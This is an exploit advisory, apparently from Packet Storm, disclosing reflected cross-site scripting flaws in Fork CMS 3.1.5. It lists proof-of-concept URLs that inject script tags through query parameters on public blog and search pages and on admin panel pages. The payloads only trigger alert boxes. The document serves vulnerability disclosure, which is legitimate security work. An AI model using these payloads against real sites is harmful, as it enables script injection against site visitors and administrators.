Fork CMS version 3.1.5 suffers from multiple reflective cross site scripting vulnerabilities.
ce9a1264ed0a258fa8e69b7087ad7b548a63a7017062b50ae45a1bde1d9dbc79###############################################################################################################
# Exploit Title: Fork CMS v.3.1.5 - Reflected Cross-Site Scripting ( XSS ) Vulnerability
# Script Page : http://www.fork-cms.com/
# Date: 13-12-2011
# Author : RandomStorm - http://www.randomstorm.com
# Avram Marius Gabriel (d3v1l)
# Tested on: Windows XP & Vista (IE9)
###############################################################################################################
# Cross-Site Scripting (XSS) on Front Site
# POC:
# http://site.com/blog/detail/article?utm_source=feed&utm_medium=rss"><script>alert('xss')</script>
# http://site.com/search?form=search&q_widget=&submit="><script>alert('xss')</script>
# http://site.com/search?form=search&q_widget="><script>alert('xss')</script>
# http://site.com/search?form="><script>alert('xss')</script>
################################################################################################################
# Cross-Site Scripting (XSS) on Admin Panel
# POC:
# http://site.com/private/en/users/edit?id=1"><script>alert('xss')</script>
# http://site.com/private/en/pages/edit?token=true&id=1"><script>alert('xss')</script>
# http://site.com/private/en/mailmotor/settings?token="><script>alert('xss')</script>
###############################################################################################################
# About: Fork CMS is dedicated to creating a user friendly environment to build,monitor and update your website.
################################################################################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed